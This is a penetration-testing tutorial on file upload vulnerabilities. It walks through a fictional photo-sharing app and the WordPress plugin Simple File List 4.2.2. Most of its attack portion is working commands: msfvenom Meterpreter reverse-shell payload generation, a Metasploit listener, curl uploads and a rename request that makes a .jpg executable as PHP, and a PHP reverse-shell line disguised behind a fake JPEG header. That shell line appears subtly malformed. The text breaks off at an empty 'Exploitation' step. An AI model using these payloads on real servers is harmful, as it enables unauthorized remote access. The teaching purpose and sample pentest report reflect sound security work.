File Upload Penetration Testing

File Upload Vulnerabilities¶

fileupload-chacho

File upload vulnerabilities occur when a web application fails to properly validate or sanitize user-uploaded files. This can lead to various security issues, including remote code execution, server-side script execution, and unauthorized access to sensitive data. In this walkthrough, we will explore the process of identifying file upload vulnerabilities in a fictional web application called "PhotoShare," crafting a payload using msfvenom, testing the vulnerability, and presenting the findings in a pentest report.

Scenario¶

You have been tasked with pentesting "PhotoShare," a web application that allows users to upload and share photos. Your goal is to identify any file upload vulnerabilities and demonstrate how they can be exploited.

Step 1: Identifying Potential File Upload Vulnerability¶

1. Reconnaissance and Enumeration:¶

Use nmap, a network scanning tool, to perform a basic scan of the target:
```
nmap -sV -p 80,443 photoshare.com
```
Discover that the application is hosted on a Linux server running Apache.
Use DirBuster, a tool for brute-forcing web paths, to find hidden directories and files:
```
dirbuster -u http://photoshare.com -w /path/to/wordlist.txt
```
This helps in discovering directories that may not be publicly listed but could contain important endpoints.
Identify a file upload endpoint: http://photoshare.com/profile/upload.php.

2. Initial Testing:¶

Visit the upload page and try uploading various file types (e.g., test.jpg, test.png, test.php) to observe the server's response.
This is to check if the server is accepting different file formats without proper validation.
Notice that the server allows .php files to be uploaded without validation, indicating a potential vulnerability.

3. File Extension Validation:¶

Verify if the application restricts file uploads by extension:
- Upload test.jpg and test.php.
- Both files are accepted and stored in the /uploads directory.
This step confirms that the server does not enforce strict file type validation.

Step 2: Crafting an msfvenom Payload¶

1. Generate the Payload:¶

Use msfvenom, a payload generation tool, to create a PHP payload that will establish a reverse shell:
```
msfvenom -p php/meterpreter_reverse_tcp LHOST=your_ip LPORT=4444 -f raw > shell.php
```
This step generates a payload that will connect back to your machine when executed on the server.

Step 3: Testing the Vulnerability¶

1. Upload the Payload:¶

Use the file upload functionality to upload shell.php. Monitor the server's response to ensure it is uploaded successfully.
Confirming the upload ensures that the payload is placed on the server and is accessible.

2. Trigger the Payload:¶

Access the uploaded file via http://photoshare.com/uploads/shell.php to trigger the payload.
Triggering the payload is essential to establish a connection back to your machine.

Step 4: Exploitation¶

1. Setting Up a Listener:¶

Set up a listener on your machine to catch the reverse shell using Metasploit, a penetration testing framework:

msfconsole
use exploit/multi/handler
set payload php/meterpreter_reverse_tcp
set LHOST your_ip
set LPORT 4444
exploit

This step is crucial to listen for incoming connections from the exploited server.

2. Execute the Payload:¶

When you navigate to http://photoshare.com/uploads/shell.php, the reverse shell connects back to your listener, providing remote access to the server.
Successful execution confirms that the vulnerability can be exploited to gain unauthorized access.

Example Pentest Report¶

Title: File Upload Vulnerability in PhotoShare

1. Introduction:¶

During a penetration test of the PhotoShare web application, a file upload vulnerability was identified. This vulnerability allows attackers to upload malicious files, leading to remote code execution.

2. Vulnerability Details:¶

Endpoint: http://photoshare.com/profile/upload.php
Description: The file upload functionality does not properly validate or sanitize user-uploaded files, allowing arbitrary code execution.

3. Steps to Reproduce:¶

Navigate to the file upload page.
Upload a malicious PHP file containing a reverse shell payload.
Access the uploaded file through the URL to trigger the payload.

4. Payload Details:¶

Payload Type: PHP reverse shell

Command Used:

msfvenom -p php/meterpreter_reverse_tcp LHOST=your_ip LPORT=4444 -f raw > shell.php

5. Impact:¶

Successful exploitation allows remote attackers to execute arbitrary code on the server, potentially leading to full system compromise.

6. Recommendations:¶

Implement proper file validation and sanitization.
Restrict allowed file types and validate file extensions.
Use secure coding practices to handle file uploads.

7. Conclusion:¶

Summary of the findings and the importance of addressing the identified vulnerability to enhance the security posture of the web application.

File Upload with Format Validation¶

In some cases, applications enforce specific file formats to mitigate malicious uploads, but there might still be vulnerabilities that can be exploited. In this walkthrough, we will explore the process of exploiting a file upload vulnerability in the WordPress plugin "Simple File List" version 4.2.2, where the ee-upload-engine.php script can be used to rename uploaded files.

Scenario¶

You have been tasked with pentesting a WordPress-based web application using the "Simple File List" plugin version 4.2.2. Your goal is to identify any file upload vulnerabilities and demonstrate how they can be exploited, particularly focusing on using the ee-upload-engine.php script to rename a .jpg file to a .php file once it is uploaded.

Step 1: Identifying Potential File Upload Vulnerability¶

1. Reconnaissance and Enumeration:¶

Use nmap, a network scanning tool, to perform a basic scan of the target:
```
nmap -sV -p 80,443 targetsite.com
```
This step is important to identify open ports and services running on the target server.
Discover that the application is hosted on a Linux server running Apache with WordPress.
Use WPScan, a WordPress vulnerability scanner, to identify plugins and potential vulnerabilities:
```
wpscan --url http://targetsite.com --enumerate p
```
Identify that the "Simple File List" plugin version 4.2.2 is installed.

2. Initial Testing:¶

Visit the upload page provided by the Simple File List plugin and try uploading various file types (e.g., test.jpg, test.php). Notice that only .jpg files are accepted.
This indicates that the server enforces specific file formats.

3. Searching for Misconfigurations:¶

Use DirBuster to scan the uploads directory for any existing files:

dirbuster -u http://targetsite.com/wp-content/uploads/simple-file-list/ -w /path/to/wordlist.txt

Identify an existing PHP file: http://targetsite.com/wp-content/uploads/simple-file-list/ee-upload-engine.php.

Step 2: Exploiting the Vulnerability¶

1. Analyzing the PHP File:¶

Access the ee-upload-engine.php file to understand its functionality. This file can rename uploaded files:
```
<?php
$old_name = $_POST['old'];
$new_name = $_POST['new'];
rename($old_name, $new_name);
?>
```
This PHP script takes two parameters, old and new, and renames the file specified by old to the name specified by new.

2. Uploading the Payload:¶

Upload a .jpg file (e.g., payload.jpg) to the uploads directory using the following curl command:

curl -X POST -F "file=@payload.jpg" http://targetsite.com/wp-content/uploads/simple-file-list/ee-upload-engine.php

Ensure the file is uploaded successfully by checking its URL: http://targetsite.com/wp-content/uploads/simple-file-list/payload.jpg.

3. Renaming the Uploaded File:¶

Use the ee-upload-engine.php script to rename payload.jpg to payload.php with a curl command:

curl -X POST -d "old=payload.jpg&new=payload.php" http://targetsite.com/wp-content/uploads/simple-file-list/ee-upload-engine.php

This changes the file extension from .jpg to .php, making it executable by the server.

Step 3: Crafting an msfvenom Payload¶

1. Generate the Payload:¶

Use msfvenom, a payload generation tool, to create a PHP payload that will establish a reverse shell:
```
msfvenom -p php/meterpreter_reverse_tcp LHOST=your_ip LPORT=4444 -f raw > payload.php
```
This step generates a payload that will connect back to your machine when executed on the server.

Step 4: Testing the Vulnerability¶

1. Upload the Payload as a .jpg File:¶

Modify the content of the generated payload.php to match a valid JPEG header to bypass the format restriction:

<?php
/* JPEG Header */
echo "/* \xFF\xD8\xFF\xE0\x00\x10JFIF */";
// Original payload
$sock=fsockopen("your_ip",4444);exec("/bin/sh -i <&3 >&3 2>&3");
?>

Save the modified payload as payload.jpg and upload it to the uploads directory using the curl command:

curl -X POST -F "file=@payload.jpg" http://targetsite.com/wp-content/uploads/simple-file-list/ee-upload-engine.php

2. Renaming the Uploaded File:¶

Use the ee-upload-engine.php script again to rename payload.jpg to payload.php with a curl command:

curl -X POST -d "old=payload.jpg&new=payload.php" http://targetsite.com/wp-content/uploads/simple-file-list/ee-upload-engine.php

3. Trigger the Payload:¶

Access the renamed file via http://targetsite.com/wp-content/uploads/simple-file-list/payload.php to trigger the payload.
Triggering the payload is essential to establish a connection back to your machine.

Step 5: Exploitation¶